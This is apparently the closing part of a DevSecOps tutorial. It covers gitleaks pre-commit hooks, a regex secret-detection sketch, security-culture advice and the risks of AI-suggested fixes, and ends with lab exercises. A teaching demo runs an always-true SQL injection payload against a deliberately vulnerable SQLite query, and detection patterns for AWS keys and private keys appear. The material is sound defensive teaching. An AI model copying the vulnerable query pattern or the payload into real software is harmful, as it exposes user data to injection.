The IaC scanning job is the obvious candidate for path filtering, since there is no point scanning infrastructure code on commits that only change Python application code. A job-level condition such as if: contains(github.event.head_commit.modified, 'terraform') looks tempting but does not work: contains() on an array tests for an exact element match rather than a substring, and head_commit does not exist on pull_request events. The reliable approach is to move the job into its own workflow and put a paths filter on the trigger (for example '**/*.tf' under on.push and on.pull_request). The tfsec tool (now part of Trivy) checks Terraform configurations for security misconfigurations: publicly accessible S3 buckets, security groups with 0.0.0.0/0 ingress, unencrypted databases, IAM policies that are too permissive. We covered these IaC security issues in detail in episode 38.

Pre-Commit Hooks -- The First Line of Defense

Before code even reaches the CI pipeline, pre-commit hooks can catch the most dangerous mistakes locally on the developer's machine:

# Install gitleaks for local secret scanning
brew install gitleaks  # macOS
# or download from github.com/gitleaks/gitleaks/releases

# .pre-commit-config.yaml (in the repository root)
# repos:
#   - repo: https://github.com/gitleaks/gitleaks
#     rev: v8.18.0
#     hooks:
#       - id: gitleaks

# Install the pre-commit framework and register the hook in this repo
pip install pre-commit
pre-commit install

# Test it: try to commit a file containing an AWS key
echo 'AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY' > test.env
git add test.env
git commit -m "oops"
# gitleaks reports the leak in test.env (exact output varies by version)
# commit blocked!

The beauty of pre-commit hooks is that the feedback loop is immediate. The developer types git commit, the hook runs in less than a second, and the commit is blocked before the secret ever enters git history. Compare this to discovering the leaked secret via trufflehog in CI (minutes later) or via GitHub's secret scanning alerts (hours later) or via an attacker using the key (days or weeks later). Earlier is always cheaper and safer.
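What a secret-scanning hook does under the hood is conceptually simple: run a set of detection rules over the text about to be committed. A bare-bones sketch with two rules, assuming the well-known AKIA prefix format for AWS access key IDs and the standard PEM private key header; the rule names and scan_text function are invented for illustration and are far cruder than the gitleaks ruleset:

```python
import re

# Two illustrative detection rules (rule id -> compiled pattern).
RULES = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private-key-block": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"
    ),
}


def scan_text(text):
    """Return (line_number, rule_id) for every rule match in the text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule_id, pattern in RULES.items():
            if pattern.search(line):
                findings.append((lineno, rule_id))
    return findings


# AKIAIOSFODNN7EXAMPLE is the placeholder key ID used in AWS documentation.
staged = "DEBUG=true\nAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
print(scan_text(staged))  # [(2, 'aws-access-key-id')]
```

A real hook would feed this the staged diff and exit non-zero when findings exist, which is what makes git abort the commit.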

Defense: Building a Security Culture That Actually Works

DevSecOps fails when it is imposed top-down. It succeeds when
developers adopt it because it makes their lives easier.

What works:
1. Make security tools FAST (Semgrep takes seconds, not hours)
2. Provide CLEAR remediation (not just "vulnerability found" --
   show the exact code change needed)
3. Security champions in every team (peers, not police)
4. Blameless post-mortems (learn from incidents, don't punish)
5. Developer-friendly tools (IDE plugins, PR comments, not
   separate portals that nobody checks)
6. Celebrate fixes (public acknowledgment of security improvements)

What fails:
1. Blocking every PR with security findings (frustration -> bypass)
2. Requiring security team approval for every deployment (bottleneck)
3. Using tools with 90% false positive rates (alert fatigue -> ignore)
4. Treating security as someone else's problem ("not my job")
5. Annual security training instead of continuous feedback (forgotten)

Point 3 on the "what fails" list deserves emphasis because it connects to something we covered in episode 46 (why security training fails). Alert fatigue is the single biggest killer of DevSecOps programs. If your SAST tool fires 200 warnings on every build and 180 of them are false positives, developers learn to ignore ALL findings -- including the 20 that are real vulnerabilities. The solution is not "force developers to review all 200" -- the solution is to tune the tool until its false positive rate is under 10%, so that nearly every finding it reports is worth investigating. Semgrep's popularity is largely built on this principle: its pattern-matching approach has inherently lower false positive rates than traditional data-flow SAST tools, because it only reports patterns it is SURE about.

The security champion model is the most effective organizational pattern I have seen for sustainable DevSecOps adoption. Instead of a central security team that reviews every PR (bottleneck), you train one developer per team to be the "security champion" -- someone who understands the OWASP Top 10, knows how to read SAST findings, and can make security decisions within their team without waiting for the security department. The champion is not a full-time security person -- they are a developer who happens to have security expertise, embedded in the team that writes the code. This distributes security knowledge across the organization instead of concentrating it in a team that becomes a bottleneck. Apart from the organizational benefits, it also builds a pipeline of developers who might eventually want to move into security full-time.

The AI Slop Connection

AI is being integrated into DevSecOps pipelines in ways that range from genuinely useful to actively dangerous. On the useful end, AI-powered triage can analyze 500 SAST findings and identify the 15 that are actually exploitable. This is where AI adds real value -- not in finding vulnerabilities (SAST tools already do that) but in separating signal from noise. A human analyst spending 2 hours reviewing 500 findings to identify the 15 real ones is expensive. An AI model that achieves 90% accuracy on that triage task in 30 seconds frees the human to focus on the findings that matter.

On the dangerous end, AI-generated remediation advice can be wrong in subtle ways that are worse than no advice at all. An AI that suggests "add input validation" for a SQL injection finding might recommend client-side JavaScript validation (completely useless against an attacker who sends raw HTTP requests, as we covered in episode 12) instead of server-side parameterized queries (the actual fix). A developer who trusts the AI suggestion without understanding the vulnerability is trading one form of insecurity for another -- they think they fixed the bug, the CI pipeline no longer flags it (because the AI's suggested code pattern does not match the SAST rule), but the vulnerability is still exploitable.

The broader risk is that AI-generated code is particularly susceptible to the vulnerabilities that DevSecOps pipelines are designed to catch. AI models trained on GitHub data have seen millions of insecure code examples -- cursor.execute(f"SELECT * FROM users WHERE name='{name}'") appears far more often in training data than the secure parameterized version, simply because there is more insecure code in the world than secure code. Running SAST against AI-generated code is therefore not optional -- it is the minimum viable quality gate for code that was written by a system optimized for "looks correct" rather than "is secure."
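To make the difference between the insecure pattern and the parameterized fix concrete, here is a minimal sketch using Python's built-in sqlite3 module. The table layout, the function names (find_user_insecure, find_user_parameterized, make_demo_db) and the payload are illustrative assumptions, not code from an earlier episode; the point is only that the same input behaves very differently in the two versions.

```python
import sqlite3


def make_demo_db():
    """Create a throwaway in-memory database with two users (demo data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
    return conn


def find_user_insecure(conn, name):
    # VULNERABLE: the input is pasted into the SQL text, so a quote character
    # in `name` can change the structure of the query itself.
    query = f"SELECT name FROM users WHERE name='{name}'"
    return conn.execute(query).fetchall()


def find_user_parameterized(conn, name):
    # The SQL text is fixed; `name` is passed separately and treated purely
    # as data by the driver, never as SQL syntax.
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()


if __name__ == "__main__":
    conn = make_demo_db()
    payload = "x' OR '1'='1"  # classic always-true injection string

    # The WHERE clause becomes name='x' OR '1'='1', so every row matches.
    print("insecure:     ", find_user_insecure(conn, payload))

    # No user is literally named "x' OR '1'='1", so nothing matches.
    print("parameterized:", find_user_parameterized(conn, payload))
```

Note that the fix lives entirely on the server side. No amount of client-side validation changes what find_user_insecure does with a raw HTTP request, which is why a remediation suggestion that only touches the front end leaves the bug exploitable.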

Exercises

Exercise 1: Set up a complete security pipeline for a sample application. Use a simple Python/Flask or Node.js/Express app. Configure: (a) pre-commit hooks with gitleaks for secret scanning, (b) a Semgrep SAST scan in CI (use the GitHub Actions example from this episode or an equivalent GitLab CI / local script), (c) pip-audit or npm audit for SCA dependency scanning, (d) Trivy for container scanning if your app uses Docker. Then introduce 3 deliberate vulnerabilities: a SQL injection (string concatenation in a query), a hardcoded API key in a config file, and a dependency with a known CVE (e.g. requests==2.25.0 for Python). Run the full pipeline and verify it catches all 3. Document which tool caught which vulnerability and at which pipeline stage. Save to ~/lab-notes/devsecops-pipeline.md.

Exercise 2: Compare 3 SAST tools against the same deliberately vulnerable codebase. Use DVWA source code, Juice Shop, or WebGoat as your target. Run Semgrep (with p/owasp-top-ten config), Bandit (for Python targets) or eslint-plugin-security (for Node targets), and CodeQL (if on GitHub) or SonarQube Community Edition. Document per tool: (a) total findings, (b) unique findings (vulnerabilities only this tool found), (c) false positive count (findings you manually verified are not real vulnerabilities), (d) scan time. Calculate the overlap: what percentage of real vulnerabilities were found by 2+ tools? Save to ~/lab-notes/sast-comparison.md.

Exercise 3: Design a security gate policy for a fictional company with 50 developers and 10 microservices. Define: (a) what blocks a deployment (by finding type and severity), (b) what generates alerts but allows deployment to proceed, (c) what is suppressed/ignored, (d) the exception process (when a blocked finding must be deployed anyway -- who approves, what documentation is required, and what the SLA for remediation is after the exception), (e) remediation SLAs by severity (Critical: X hours, High: X days, Medium: X weeks, Low: X quarters). Present it as a 1-page policy document that a development team lead would actually read and follow. Save to ~/lab-notes/security-gate-policy.md.

Thanks, and until next time!

@scipio

